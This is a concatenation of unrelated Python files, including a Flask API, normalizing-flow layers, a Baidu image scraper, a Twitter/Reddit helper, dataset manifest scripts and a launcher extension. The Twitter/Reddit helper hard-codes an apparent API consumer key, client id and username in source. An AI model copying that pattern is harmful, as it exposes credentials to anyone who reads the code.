    """Trivial health-check endpoint served at the API root."""
    def get(self):
        return {"hello": "world"}
class TopicLists(Resource):
    """Paginated listing of all topic lists."""

    def __init__(self):
        # Pagination query parameters with sensible defaults.
        self.reqparse = reqparse.RequestParser()
        self.reqparse.add_argument("page", type=int, required=False, default=1)
        self.reqparse.add_argument("per", type=int, required=False, default=10)
        super().__init__()

    def get(self):
        args = self.reqparse.parse_args()
        page = TopicList.select().paginate(args["page"], args["per"])
        topic_lists = [model_to_dict(entry) for entry in page]
        meta = {"count": TopicList.select().count()}
        return jsonify({"topic_lists": topic_lists, "meta": meta})
class SingleTopic(Resource):
    """Detail endpoint for one topic, keyed by its numeric id."""

    def get(self, topic_id):
        try:
            topic = Topic.get(Topic.topic_id == topic_id)
        except Topic.DoesNotExist:
            # BUG FIX: the previous bare ``except:`` converted *every*
            # error (including programming bugs in serialisation) into a
            # 404; only a missing row should be a 404.
            abort(404, message="Topic id {} is not found".format(topic_id))
        topic_dict = model_to_dict(topic)
        # The images column stores a comma-separated list; expose it as a list.
        topic_dict["images"] = topic_dict["images"].split(",")
        return jsonify(topic_dict)
# Route table: health check at the root, topic detail, paginated topic lists.
api.add_resource(HelloWorld, "/")
api.add_resource(SingleTopic, "/api/topics/<int:topic_id>")
api.add_resource(TopicLists, "/api/topic_lists")

if __name__ == "__main__":
    # debug=True enables the reloader and debugger -- development only.
    app.run(debug=True)
| StarcoderdataPython |
8058642 | from typing import *
from .. import tensor as T
from ..layers import is_jit_layer
from ..tensor import Tensor, Module, split, concat
from .core import *
__all__ = [
'SplitFlow', 'SplitFlow1d', 'SplitFlow2d', 'SplitFlow3d',
]
class SplitFlow(Flow):
"""
A flow which splits input `x` into halves, apply different flows on each
half, then concat the output together.
Basically, a :class:`SplitFlow` performs the following transformation::
x1, x2 = split(x, axis=axis, section=sections)
y1, log_det1 = left(x1)
if right is not None:
y2, log_det2 = right(x2)
else:
y2, log_det2 = x2, 0.
y = concat([y1, y2], axis=axis)
log_det = log_det1 + log_det2
"""
__constants__ = Flow.__constants__ + (
'x_sections', 'x_axis', 'y_sections', 'y_axis',
)
left: Module
right: Module
x_sections: List[int]
x_axis: int
y_sections: List[int]
y_axis: int
def __init__(self,
x_sections: Sequence[int],
left: Flow,
right: Optional[Flow] = None,
y_sections: Optional[Sequence[int]] = None,
x_axis: int = -1,
y_axis: Optional[int] = None):
"""
Construct a new :class:`SplitFlow`.
Args:
x_sections: The size of each sections of the splitted `x` along
`x_axis`.
left : The `left` flow (see above).
right: The `right` flow (see above).
`right.x_event_ndims` must equal to `left.x_event_ndims`, and
`right.y_event_ndims` must equal to `left.y_event_ndims`.
If not specified, the right flow will be identity.
Must be specified if `left.x_event_ndims != left.y_event_ndims`.
y_sections: The size of each sections of the splitted `y` along
`y_axis`. Defaults to be the same as `x_sections`.
x_axis: Along which axis to split or join `x`.
y_axis: Along which axis to split or join `y`.
If not specified, use `x_axis`.
Must be specified if `left.x_event_ndims != left.y_event_ndims`.
"""
# validate the arguments
if len(x_sections) != 2 or any(s < 1 for s in x_sections):
raise ValueError(f'`x_sections` must be a sequence of '
f'two positive integers: got {y_sections!r}.')
x_sections = list(map(int, x_sections))
x_axis = int(x_axis)
if y_sections is None:
y_sections = x_sections
else:
if len(y_sections) != 2 or any(s < 1 for s in y_sections):
raise ValueError(f'`y_sections` must be None or a sequence of '
f'two positive integers: got {y_sections!r}.')
y_sections = list(map(int, y_sections))
if not isinstance(left, Flow) and not is_jit_layer(left):
raise TypeError(f'`left` is not a flow: got {left!r}.')
x_event_ndims = left.get_x_event_ndims()
y_event_ndims = left.get_y_event_ndims()
if right is not None:
if not isinstance(right, Flow) and not is_jit_layer(right):
raise TypeError(f'`right` is not a flow: got {right!r}.')
if right.get_x_event_ndims() != x_event_ndims or \
right.get_y_event_ndims() != y_event_ndims:
raise ValueError(
f'`left` and `right` flows must have same `x_event_ndims` '
f'and `y_event_ndims`: '
f'got `left.x_event_ndims` == {left.get_x_event_ndims()!r}, '
f'`left.y_event_ndims` == {left.get_y_event_ndims()}, '
f'`right.x_event_ndims` == {right.get_x_event_ndims()}, '
f'and `right.y_event_ndims` == {right.get_y_event_ndims()}.'
)
if x_event_ndims != y_event_ndims:
if y_axis is None:
raise ValueError('`x_event_ndims` != `y_event_ndims`, thus '
'`y_axis` must be specified.')
if right is None:
raise ValueError('`x_event_ndims` != `y_event_ndims`, thus '
'`right` must be specified.')
else:
if y_axis is None:
y_axis = x_axis
else:
y_axis = int(y_axis)
super(SplitFlow, self).__init__(
x_event_ndims=x_event_ndims,
y_event_ndims=y_event_ndims,
explicitly_invertible=True,
)
self.left = left
self.right = right
self.x_sections = x_sections
self.x_axis = x_axis
self.y_sections = y_sections
self.y_axis = y_axis
    def _transform(self,
                   input: Tensor,
                   input_log_det: Optional[Tensor],
                   inverse: bool,
                   compute_log_det: bool
                   ) -> Tuple[Tensor, Optional[Tensor]]:
        """
        Split the input along the split axis, transform each half with the
        `left` (and optional `right`) sub-flow, then concatenate the halves
        along the join axis.

        When `inverse` is False the input is split along `x_axis` with
        `x_sections` and joined along `y_axis`; when True the roles of the
        `x` and `y` settings are swapped.  The log-determinant is threaded
        through both sub-flow calls.
        """
        # NOTE: the "annotated empty list + extend" pattern (instead of a
        # direct assignment) looks redundant, but may be required for
        # TorchScript-style scripting of this method -- keep it as-is.
        sections: List[int] = []
        if inverse:
            sections.extend(self.y_sections)
            axis = self.y_axis
            join_axis = self.x_axis
        else:
            sections.extend(self.x_sections)
            axis = self.x_axis
            join_axis = self.y_axis
        # split the input into its two halves
        out_left, out_right = split(input, sections=sections, axis=axis)
        # the left half always goes through the `left` flow
        out_left, output_log_det = self.left(
            input=out_left, input_log_det=input_log_det, inverse=inverse,
            compute_log_det=compute_log_det,
        )
        # the right half is transformed only when a `right` flow was given;
        # otherwise it passes through unchanged
        if self.right is not None:
            out_right, output_log_det = self.right(
                input=out_right, input_log_det=output_log_det, inverse=inverse,
                compute_log_det=compute_log_det,
            )
        output = concat([out_left, out_right], axis=join_axis)
        return output, output_log_det
class SplitFlowNd(SplitFlow):
    """Base class for convolutional split flows, which split `x` along the
    channel axis."""

    def __init__(self,
                 x_sections: Sequence[int],
                 left: Flow,
                 right: Optional[Flow] = None,
                 y_sections: Optional[Sequence[int]] = None):
        """
        Construct a new convolutional split flow.

        Args:
            x_sections: The size of each sections of the splitted `x` along
                the channel axis.
            left : The `left` flow.
            right: The `right` flow.
            y_sections: The size of each sections of the splitted `y` along
                the channel axis.  Defaults to be the same as `x_sections`.
        """
        spatial_ndims = self._get_spatial_ndims()
        event_ndims = spatial_ndims + 1
        # channel axis: the last axis for channel-last backends, otherwise
        # the axis immediately before the spatial dimensions
        feature_axis = -1 if T.IS_CHANNEL_LAST else -(spatial_ndims + 1)

        for arg_name, arg in (('left', left), ('right', right)):
            # type errors are deferred to the base class; only validate the
            # event ndims when `arg` looks like a flow
            if arg is None or not hasattr(arg, 'x_event_ndims'):
                continue
            if (arg.get_x_event_ndims() != event_ndims or
                    arg.get_y_event_ndims() != event_ndims):
                raise ValueError(
                    f'The `x_event_ndims` and `y_event_ndims` of '
                    f'`{arg_name}` are required to be {event_ndims}: '
                    f'got `x_event_ndims` == {arg.get_x_event_ndims()}, '
                    f'and `y_event_ndims` == {arg.get_y_event_ndims()}.'
                )

        super().__init__(
            x_sections=x_sections,
            left=left,
            right=right,
            y_sections=y_sections,
            x_axis=feature_axis,
            y_axis=feature_axis,
        )

    def _get_spatial_ndims(self) -> int:
        """Return the number of spatial dimensions (1, 2 or 3)."""
        raise NotImplementedError()
class SplitFlow1d(SplitFlowNd):
    """
    A flow which splits the channel axis of 1D convolutional `x` into halves,
    apply different 1D convolutional flows on each half, then concat the
    output together.
    """

    def _get_spatial_ndims(self) -> int:
        # one spatial dimension (length)
        return 1
class SplitFlow2d(SplitFlowNd):
    """
    A flow which splits the channel axis of 2D convolutional `x` into halves,
    apply different 2D convolutional flows on each half, then concat the
    output together.
    """

    def _get_spatial_ndims(self) -> int:
        # two spatial dimensions (height, width)
        return 2
class SplitFlow3d(SplitFlowNd):
    """
    A flow which splits the channel axis of 3D convolutional `x` into halves,
    apply different 3D convolutional flows on each half, then concat the
    output together.
    """

    def _get_spatial_ndims(self) -> int:
        # three spatial dimensions (depth, height, width)
        return 3
# ---- dataset boundary (StarcoderdataPython) ----
# Source: hopper-maker/openxc-python -- openxc/sinks/notifier.py (id 11366393)
"""A data sink implementation for the core listener notification service of
:class:`openxc.vehicle.Vehicle`.
"""
from threading import Thread
from collections import defaultdict
import logging
from openxc.measurements import Measurement, UnrecognizedMeasurementError
from .queued import QueuedSink
LOG = logging.getLogger(__name__)
class MeasurementNotifierSink(QueuedSink):
    """Notify previously registered callbacks whenever measurements of a
    certain type have been received.

    This data sink is the core of the asynchronous interface of
    :class:`openxc.vehicle.Vehicle`.
    """
    def __init__(self):
        super(MeasurementNotifierSink, self).__init__()
        # Maps measurement name -> set of callbacks interested in it.
        self.callbacks = defaultdict(set)
        self.notifier = self.Notifier(self.queue, self._propagate)

    def register(self, measurement_class, callback):
        """Call the ``callback`` with any new values of ``measurement_class``
        received.
        """
        self.callbacks[Measurement.name_from_class(measurement_class)
                ].add(callback)

    def unregister(self, measurement_class, callback):
        """Stop notifying ``callback`` of new values of ``measurement_class``.

        If the callback wasn't previously registered, this method will have no
        effect.
        """
        # discard() (not remove()) so unregistering a callback that was never
        # registered really is a no-op, as documented -- remove() raises
        # KeyError.
        self.callbacks[Measurement.name_from_class(measurement_class)
                ].discard(callback)

    def _propagate(self, measurement, **kwargs):
        # Copy the per-name set before merging in the generic callbacks
        # (those registered for the base Measurement class).  The original
        # updated the registry set in place, permanently leaking generic
        # callbacks into every per-measurement set they had fired for.
        measurement_callbacks = set(self.callbacks[measurement.name])
        measurement_callbacks.update(self.callbacks[Measurement.name])
        for callback in measurement_callbacks:
            try:
                callback(measurement, **kwargs)
            except TypeError:
                # Fallback for callbacks that don't accept keyword arguments.
                # NOTE(review): this also catches TypeErrors raised *inside*
                # the callback, which then gets invoked a second time.
                callback(measurement)

    class Notifier(Thread):
        """Daemon thread that drains the sink's queue and dispatches each
        parsed measurement to ``callback``."""
        def __init__(self, queue, callback):
            super(MeasurementNotifierSink.Notifier, self).__init__()
            self.daemon = True
            self.queue = queue
            self.callback = callback
            self.start()

        def run(self):
            while True:
                message, kwargs = self.queue.get()
                try:
                    measurement = Measurement.from_dict(message)
                    self.callback(measurement, **kwargs)
                except UnrecognizedMeasurementError as e:
                    # warning() -- Logger.warn is a deprecated alias
                    LOG.warning(e)
                finally:
                    # Always mark the item processed, even when parsing
                    # failed; otherwise queue.join() would block forever
                    # after a single unrecognized message.
                    self.queue.task_done()
# ---- dataset boundary (StarcoderdataPython) ----
# Generated by Django 2.0.1 on 2019-01-13 18:27 (id 9789276)
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: removes the ``CustomerJavaScript`` model
    (and its database table) introduced by migration 0030."""

    dependencies = [
        ('app01', '0030_customerjavascript'),
    ]

    operations = [
        migrations.DeleteModel(
            name='CustomerJavaScript',
        ),
    ]
# ---- dataset boundary (StarcoderdataPython) ----
# Source: 2017.DigitalImageProcessing/FaceRecognition/crawler/crawler/spiders/imagespider.py (id 3397560)
# -*- coding: utf-8 -*-
import os
import time
import scrapy
import twisted
from selenium import webdriver
from crawler.items import ImageItem
class BaiduImageSpider(scrapy.Spider):
    """Scrapy spider that searches Baidu Images for ``keyword`` and collects
    up to ``number`` image URLs, using a PhantomJS webdriver to render the
    JavaScript-driven, infinite-scroll result page."""
    name = "BaiduImageSpider"
    allowed_domains = ["baidu.com"]
    download_delay = 1
    def __init__(self, keyword="lena", number="100", *args, **kwargs):
        """Spider arguments arrive as strings from ``scrapy crawl -a ...``."""
        super(BaiduImageSpider, self).__init__(*args, **kwargs)
        # init arguments
        self.keyword = keyword
        self.number = int(number)
        # init webdriver
        # NOTE(review): PhantomJS support was dropped from Selenium 3.8+;
        # newer environments would need a headless Chrome/Firefox driver.
        path = os.path.join("tools", "phantomjs")
        self.driver = webdriver.PhantomJS(path)
    def start_requests(self):
        # Single seed request: the Baidu image-search results page for the
        # configured keyword; parse errors go through self.error.
        urls = [
            r"https://image.baidu.com/search/index?tn=baiduimage&word={}"\
                .format(self.keyword),
        ]
        for url in urls:
            yield scrapy.Request(url = url, callback = self.parse, errback = self.error)
    def parse(self, response):
        """Render the page, scroll until ``self.number`` images have loaded
        (or scrolling yields no new images), and return an ImageItem whose
        ``image_urls``/``images`` fields drive the image download pipeline."""
        self.logger.info("start parsing")
        self.driver.get(response.url)
        # find n images
        xpath = r'//*[@id="imgid"]/div[*]/ul/li[*]/div[*]/a/img[@data-imgurl]'
        n = self.number
        i = 0
        # NOTE(review): if number <= 0 the loop body never runs and `elems`
        # below is unbound, raising NameError -- confirm callers always pass
        # a positive number.
        while i < n:
            # count images
            elems = self.driver.find_elements_by_xpath(xpath)
            # update i; stop when scrolling loaded no new images
            if i != len(elems): i = len(elems)
            else: break
            # scroll down to the last element to trigger lazy loading
            actions = webdriver.ActionChains(self.driver)
            actions.move_to_element(elems[-1])
            actions.perform()
            time.sleep(0.5)
        self.logger.info("found {} image(s)".format(i))
        # save images: filenames are "<keyword><index 0-padded><ext>"
        item = ImageItem()
        if elems:
            item["image_urls"] = [elem.get_attribute("data-imgurl") for elem in elems]
            item["images"] = ["{}{:04}{}".format(self.keyword, i, os.path.splitext(x)[1])\
                              for i,x in enumerate(item["image_urls"])]
        self.logger.info("start downloading")
        return item
    # errors from downloader
    def error(self, failure):
        self.logger.error(repr(failure))
# References:
#
# [Scrapy: Logging]
# (https://doc.scrapy.org/en/latest/topics/logging.html)
# [PhantomJS]
# (http://phantomjs.org/download.html)
# [selenium with scrapy for dynamic page]
# (https://stackoverflow.com/a/17979285)
# [XPath Syntax]
# (https://www.w3schools.com/xml/xpath_syntax.asp)
# [Scroll down to bottom of infinite page with PhantomJS in Python]
# (https://stackoverflow.com/a/28928684)
# [Scrapy: Spider arguments]
# (https://doc.scrapy.org/en/latest/topics/spiders.html#spider-arguments)
# [Scrapy: Using errbacks to catch exceptions in request processing]
# (https://doc.scrapy.org/en/latest/topics/request-response.html#topics-request-response-ref-errbacks)
# [Crawling with Scrapy – Download Images]
# (http://www.scrapingauthority.com/scrapy-download-images/)
# [scrapy-3 利用框架,抓取图片]
# (https://my.oschina.net/jastme/blog/280114)
# [Getting index of item while processing a list using map in python]
# (https://stackoverflow.com/a/5432789)
# ---- dataset boundary (StarcoderdataPython) ----
# Source: helper.py (id 25182)
import requests
import pandas as pd
import tweepy #for twitter
import os
from bs4 import BeautifulSoup
import praw #for reddit
import requests
import requests.auth
def getTweets(search_terms=None):
    """Search Twitter for *search_terms* and return a dict mapping keys
    't0', 't1', ... to twitframe embed URLs for the matching tweets.

    :param search_terms: terms passed to the Twitter search API;
        defaults to ['counterfeit', 'amazonHelp'].
    """
    # Avoid a mutable default argument (a list default would be created
    # once and shared across all calls); bind the default here instead.
    if search_terms is None:
        search_terms = ['counterfeit', 'amazonHelp']
    # SECURITY NOTE: credentials are hard-coded; they should be loaded from
    # the environment or a secrets store instead.
    consumer_key = '6CM1Yqk0Qz6KUXsDQUS8xmahS'
    consumer_secret = '<KEY>'
    access_token = '<KEY>'
    access_token_secret = '<KEY>'
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    api = tweepy.API(auth)
    cfit_tweets = api.search(q=search_terms, count=1000)
    df = pd.DataFrame()
    df['text'] = [x.text for x in cfit_tweets]
    df['source'] = ['twitter: "counterfiet, amazonelp"' for x in cfit_tweets]
    # everything from the first 'http' up to the first newline
    df['url'] = [x.text[x.text.find('http'):].split('\n')[0] for x in cfit_tweets]
    df['retweets'] = [x.retweet_count for x in cfit_tweets]
    df['favorites'] = [x.favorite_count for x in cfit_tweets]
    df['iframe'] = ['https://twitframe.com/show?url=https://twitter.com/{}/status/{}'.format(x.user.screen_name, x.id) for x in cfit_tweets]
    keys = ['t' + str(i) for i in range(len(df['iframe'].tolist()))]
    values = df['iframe'].tolist()
    return dict(zip(keys, values))
def getReddits():
    """Return a dict mapping keys 'r0', 'r1', ... to .png image URLs taken
    from the newest posts of the FulfillmentByAmazon subreddit."""
    # SECURITY NOTE: credentials are hard-coded; they should be loaded from
    # the environment or a secrets store instead.
    reddit = praw.Reddit(client_id='BXTDVNZqv8SFyw',
                         client_secret='<KEY>',
                         password='<PASSWORD>',
                         user_agent='testscript by /u/whs2k',
                         username='whs2k')
    if reddit.read_only:
        print('We Are Connected to Reddit!')
    # search terms: controversial, gilded, hot, new, rising, top
    png_urls = [x.url for x in reddit.subreddit('FulfillmentByAmazon').new(limit=1000) if '.png' in x.url]
    print('We have {} png urls'.format(len(png_urls)))
    # BUG FIX: the original key-building line was a syntax error and
    # referenced an undefined DataFrame; key the URLs as 'r0', 'r1', ...
    keys = ['r' + str(i) for i in range(len(png_urls))]
    return dict(zip(keys, png_urls))
def getTweetsDF():
    """Search Twitter for counterfeit- and fake-related tweets, combine and
    de-duplicate the two result sets, and return a dict mapping keys
    't0', 't1', ... to twitframe embed URLs for the top 50 tweets by
    retweet count."""
    # SECURITY NOTE: credentials are hard-coded; they should be loaded from
    # the environment or a secrets store instead.
    consumer_key = '<KEY>'
    consumer_secret = '<KEY>'
    access_token = '<KEY>'
    access_token_secret = '<KEY>'
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    api = tweepy.API(auth)
    cfit_tweets = api.search(q=['counterfeit', 'amazonHelp'], count=1000)
    fake_tweets = api.search(q=['fake', 'amazonHelp'], count=1000)

    def _to_frame(tweets, source_label):
        # One result frame per search; local helper avoids duplicating the
        # column construction for both searches.
        frame = pd.DataFrame()
        frame['text'] = [x.text for x in tweets]
        frame['source'] = [source_label for x in tweets]
        frame['url'] = [x.text[x.text.find('http'):].split('\n')[0] for x in tweets]
        frame['retweets'] = [x.retweet_count for x in tweets]
        frame['favorites'] = [x.favorite_count for x in tweets]
        frame['iframe'] = [
            'https://twitframe.com/show?url=https://twitter.com/{}/status/{}'.format(
                x.user.screen_name, x.id) for x in tweets]
        return frame

    df = _to_frame(cfit_tweets, 'twitter: "counterfiet, amazonelp"')
    df1 = _to_frame(fake_tweets, 'twitter: "fake, amazonHelp"')
    # BUG FIX: the original computed this combined/de-duplicated frame but
    # discarded the result and returned only the second search's rows.
    # pd.concat replaces DataFrame.append, which was removed in pandas 2.0.
    df_final = (pd.concat([df, df1], ignore_index=True)
                .sort_values('retweets', ascending=False)
                .drop_duplicates(['text', 'source'])
                .reset_index(drop=True)
                .head(50))
    keys = ['t' + str(i) for i in range(len(df_final))]
    values = df_final['iframe'].tolist()
    return dict(zip(keys, values))
# ---- dataset boundary (StarcoderdataPython) ----
# id 1835929
from utils import (number_to_digits,
digits_to_number,
is_palindrome,
capacity)
# Maximum number of reverse-and-add iterations before a number is deemed
# a Lychrel candidate.
MAX_ITERATIONS_COUNT = 50


def lychrel(number: int) -> bool:
    """Return True if *number* looks like a Lychrel number: repeatedly
    adding the number to its own digit-reversal never yields a palindrome
    within MAX_ITERATIONS_COUNT iterations.

    Uses direct string reversal instead of round-tripping through digit
    lists, which is simpler and needs no helper functions.
    """
    for _ in range(MAX_ITERATIONS_COUNT):
        number += int(str(number)[::-1])
        if str(number) == str(number)[::-1]:
            return False
    return True
# Import-time smoke tests: known non-Lychrel examples, a known Lychrel
# candidate, and the expected count of candidates below 10,000.
assert not lychrel(47)
assert not lychrel(349)
assert lychrel(196)
assert capacity(filter(lychrel, range(1, 10_000))) == 249
# ---- dataset boundary (StarcoderdataPython) ----
# Demonstrate list indexing inside an f-string message.
bicycles = ['trek', 'cannondale', 'redline', 'specialized']
first_bike = bicycles[0].title()
message = f"My first bicycle was a {first_bike}"
print(message)
# ---- dataset boundary (StarcoderdataPython) ----
# Source: aprilnovak/openmc (id 3206168)
from openmc.examples import slab_mg
from tests.testing_harness import PyAPITestHarness
def test_mg_survival_biasing():
    """Run the multi-group slab model with survival biasing enabled and
    check the resulting statepoint via the project test harness
    (presumably compared against stored reference results -- see
    tests.testing_harness)."""
    model = slab_mg()
    # Enable survival biasing (implicit capture) for this run.
    model.settings.survival_biasing = True
    harness = PyAPITestHarness('statepoint.10.h5', model)
    harness.main()
# ---- dataset boundary (StarcoderdataPython) ----
# Source: Sebaestschjin/advent-of-code -- year2020/day22/reader.py (id 8186244)
from pathlib import Path
def read(filename='in'):
    """Read the puzzle input stored next to this module and parse it into
    the two players' decks."""
    input_path = Path(__file__).parent / filename
    with input_path.open() as handle:
        return read_lines(handle.readlines())
def read_lines(lines):
    """Join the raw lines, split on the blank line separating the two
    players' paragraphs, and parse each paragraph into a deck."""
    player_one, player_two = ''.join(lines).split('\n\n')
    return read_deck(player_one), read_deck(player_two)
def read_deck(lines):
    """Parse one player's paragraph: skip the 'Player N:' header line and
    convert each remaining line to an int card value."""
    rows = lines.strip().split('\n')
    return [int(card) for card in rows[1:]]
# ---- dataset boundary (StarcoderdataPython) ----
# Source: src/backend/hacker_gif_poll/graphql_api/tenor/queries/hacker_gif.py (id 12852477)
# Base imports
from os import environ
# Third party imports
from graphene import Field, ObjectType, String, Int
# Project imports
from graphql_api.tenor.schemas.hacker_gif.result import Result
from graphql_api.tenor.resolvers.hacker_gif import resolve_hacker_gifs
API_KEY = environ.get('TENOR_API_KEY')
class HackerGifQuery(ObjectType):
    """GraphQL query type exposing the ``hacker_gifs`` field, resolved
    against the Tenor API by ``resolve_hacker_gifs``."""
    hacker_gifs = Field(
        Result,
        key=String(default_value=API_KEY),  # Tenor API key (TENOR_API_KEY env var)
        limit=Int(default_value=20),        # max number of GIFs returned
        query=String(default_value='hacker'),
        resolver=resolve_hacker_gifs
    )
# ---- dataset boundary (StarcoderdataPython) ----
# id 1817616
"""
Prepare manifest files for speech recognition with OTS FRF_ASR001 dataset.
Author:
* <NAME>, 2022-01-24
"""
import os
import json
import csv
import logging
import random
from pathlib import Path
from speechbrain.utils.data_utils import get_all_files
from speechbrain.dataio.dataio import read_audio
logger = logging.getLogger(__name__)
SAMPLERATE = 16000 # 16000 for FRF_ASR003
SEED = 1234
RATIO = '8:1:1'
def prepare_frf_asr003(
        data_folder, ext, save_train, save_valid, save_test):
    """Shuffle the dataset's wav files, split them into train/valid/test
    according to RATIO, and write one manifest per split (plus an 'all'
    manifest) in the requested format ('json' or 'csv')."""
    audio_files = sorted(get_all_files(data_folder, match_and=[".wav"]))
    text_files = [f
                  for f in sorted(get_all_files(data_folder, match_and=[".txt"]))
                  if '_orig' not in f]
    assert len(audio_files) == len(text_files), "audio and text does not match!"

    # shuffle reproducibly
    random.seed(SEED)
    random.shuffle(audio_files)

    # turn the RATIO string into per-split fractions
    ratio = [int(r) for r in RATIO.split(':')]
    total = sum(ratio)
    percent = {
        'train': float(ratio[0]) / total,
        'valid': float(ratio[1]) / total,
        'test': float(ratio[2]) / total,
    }

    # cut the shuffled list at the split boundaries, then re-sort each split
    nwavs = len(audio_files)
    n_train = int(nwavs * percent['train'])
    n_train_valid = int(nwavs * (percent['train'] + percent['valid']))
    wav_list_train = sorted(audio_files[:n_train])
    wav_list_valid = sorted(audio_files[n_train:n_train_valid])
    wav_list_test = sorted(audio_files[n_train_valid:])

    if ext == 'json':
        writer = create_json
    elif ext == 'csv':
        writer = create_csv
    else:
        return
    # manifests for the 3 splits, plus one covering all files together
    writer(wav_list_train, save_train)
    writer(wav_list_valid, save_valid)
    writer(wav_list_test, save_test)
    writer(sorted(audio_files), save_train.replace('train', 'all'))
def create_json(wav_list, json_file):
    """Write a JSON manifest for the given wav files.

    Each entry maps an utterance id to its template-relative wav path,
    duration in seconds, and transcription.

    Arguments
    ---------
    wav_list : list
        Paths of the wav files to include.
    json_file : str
        Path of the JSON manifest to write.
    """
    json_dict = {}
    for wav_file in wav_list:
        # Reading the signal (to retrieve duration in seconds)
        signal = read_audio(wav_file)
        duration = signal.shape[0] / SAMPLERATE
        # Reading the transcription: use a context manager so the handle is
        # closed (the original leaked it) and force UTF-8 for French text.
        trans_file = wav_file.replace(".wav", ".txt")
        assert os.path.isfile(trans_file), "{} not exist".format(trans_file)
        with open(trans_file, encoding="utf-8") as trans_f:
            trans = trans_f.readlines()[0]
        # Manipulate path to get relative path and uttid
        path_parts = wav_file.split(os.path.sep)
        uttid, _ = os.path.splitext(path_parts[-1])
        relative_path = os.path.join("{data_root}", *path_parts[-2:])
        # Create entry for this utterance
        json_dict[uttid] = {
            "wav": relative_path,
            "length": duration,
            "words": trans,
        }
    # ensure_ascii=False needs an explicit UTF-8 encoding to be safe on
    # platforms whose default encoding is not UTF-8.
    with open(json_file, mode="w", encoding="utf-8") as json_f:
        json.dump(json_dict, json_f, ensure_ascii=False, indent=2)
    logger.info(f"{json_file} successfully created!")
def create_csv(wav_list, csv_file):
    """Write a CSV manifest (ID, duration, wav, spk_id, wrd) for the given
    wav files.

    Arguments
    ---------
    wav_list : list
        Paths of the wav files to include.
    csv_file : str
        Path of the CSV manifest to write.
    """
    header = ['ID', 'duration', 'wav', 'spk_id', 'wrd']
    rows = []
    for wav_file in wav_list:
        # Reading the signal (to retrieve duration in seconds)
        signal = read_audio(wav_file)
        duration = signal.shape[0] / SAMPLERATE
        # Reading the transcription: use a context manager so the handle is
        # closed (the original leaked it) and force UTF-8 for French text.
        trans_file = wav_file.replace(".wav", ".txt")
        assert os.path.isfile(trans_file), "{} not exist".format(trans_file)
        with open(trans_file, encoding="utf-8") as trans_f:
            trans = trans_f.readlines()[0]
        # Manipulate path to get relative path and uttid
        path_parts = wav_file.split(os.path.sep)
        uttid, _ = os.path.splitext(path_parts[-1])
        # speaker id is everything before the final '_' of the utterance id
        spk_id = '_'.join(uttid.split('_')[:-1])
        relative_path = os.path.join("$data_root", *path_parts[-2:])
        rows.append((uttid, str(duration), relative_path, spk_id, trans))
    # newline='' is required by the csv module; add explicit UTF-8 encoding.
    with open(csv_file, 'w', newline='', encoding="utf-8") as f:
        csv_out = csv.writer(f)
        csv_out.writerow(header)
        for row in rows:
            csv_out.writerow(row)
    logger.info(f"{csv_file} successfully created!")
if __name__ == '__main__':
    # Script configuration: build train/valid/test manifests for the
    # OTS French FRF_ASR003 dataset under the user's home directory.
    dataset = 'FRF_ASR003'
    data_folder = '{}/Data/ots_french/{}/sel/'.format(
        Path.home(), dataset)
    list_folder = '../filelists/ots_french/{}'.format(dataset.lower())
    os.makedirs(list_folder, exist_ok=True)
    ext = 'csv' # 'json', or 'csv'
    save_train = os.path.join(list_folder, 'train.{}'.format(ext))
    save_valid = os.path.join(list_folder, 'valid.{}'.format(ext))
    save_test = os.path.join(list_folder, 'test.{}'.format(ext))
    prepare_frf_asr003(data_folder, ext, save_train, save_valid, save_test)
# ---- dataset boundary (StarcoderdataPython) ----
# id 11232424
import json
import logging
from ulauncher.api.client.Extension import Extension
from ulauncher.api.client.EventListener import EventListener
from ulauncher.api.shared.event import KeywordQueryEvent
from ulauncher.api.shared.item.ExtensionResultItem import ExtensionResultItem
from ulauncher.api.shared.action.RenderResultListAction import RenderResultListAction
from ulauncher.api.shared.action.CopyToClipboardAction import CopyToClipboardAction
import datetime
logger = logging.getLogger(__name__)
class DemoExtension(Extension):
    """Ulauncher extension entry point: wires keyword query events to the
    listener that builds the date/time result items."""

    def __init__(self):
        super().__init__()
        self.subscribe(KeywordQueryEvent, KeywordQueryEventListener())
class KeywordQueryEventListener(EventListener):
    """Builds the list of copy-to-clipboard result items (current date/time
    in several formats) shown when the extension's keyword is typed."""
    def on_event(self, event, extension):
        items = []
        logger.info('preferences %s' % json.dumps(extension.preferences))
        # data = event.get_data()
        # print("my event", event.get_keyword())
        # print('{0:%Y-%m-%d}'.format(datetime.datetime.now()))
        # NOTE(review): datetime.now() is called separately per item, so the
        # values could straddle a minute/day boundary between items.
        items.append(ExtensionResultItem(icon='images/icon.png',
                                         name='YYYY-MM-DD',
                                         description='Enter to copy to the clipboard',
                                         on_enter=CopyToClipboardAction('{0:%Y-%m-%d}'.format(datetime.datetime.now()))))
        items.append(ExtensionResultItem(icon='images/icon.png',
                                         name='HH:mm',
                                         description='Enter to copy to the clipboard',
                                         on_enter=CopyToClipboardAction(
                                             '{0:%H:%M}'.format(datetime.datetime.now()))))
        items.append(ExtensionResultItem(icon='images/icon.png',
                                         name='YYYY-MM-DD HH:mm',
                                         description='Enter to copy to the clipboard',
                                         on_enter=CopyToClipboardAction(
                                             '{0:%Y-%m-%d %H:%M}'.format(datetime.datetime.now()))))
        # Find the 3-hour bucket containing the current hour; the final
        # single-element tuple (21,) marks the open-ended 21-24 bucket and
        # is matched by value before its (missing) upper bound is indexed.
        now = datetime.datetime.now()
        time_intervals = [
            (0, 3), (3, 6), (6, 9), (9, 12), (12, 15), (15, 18), (18, 21), (21,)
        ]
        current_time_interval = ''
        for i in time_intervals:
            if i[0] == 21:
                current_time_interval = '21-24'
                break
            if i[0] <= now.hour and now.hour < i[1]:
                current_time_interval = '{}-{}'.format(i[0], i[1])
                break
        items.append(ExtensionResultItem(icon='images/icon.png',
                                         name='HH1-HH2',
                                         description='Enter to copy to the clipboard',
                                         on_enter=CopyToClipboardAction(
                                             current_time_interval)))
        items.append(ExtensionResultItem(icon='images/icon.png',
                                         name='HH1-HH2: HH:mm',
                                         description='Enter to copy to the clipboard',
                                         on_enter=CopyToClipboardAction(
                                             '%s: %s' % (current_time_interval,'{0:%H:%M}'.format(datetime.datetime.now())))))
        return RenderResultListAction(items)
if __name__ == '__main__':
    # Start the extension's main loop when launched directly by Ulauncher.
    DemoExtension().run()
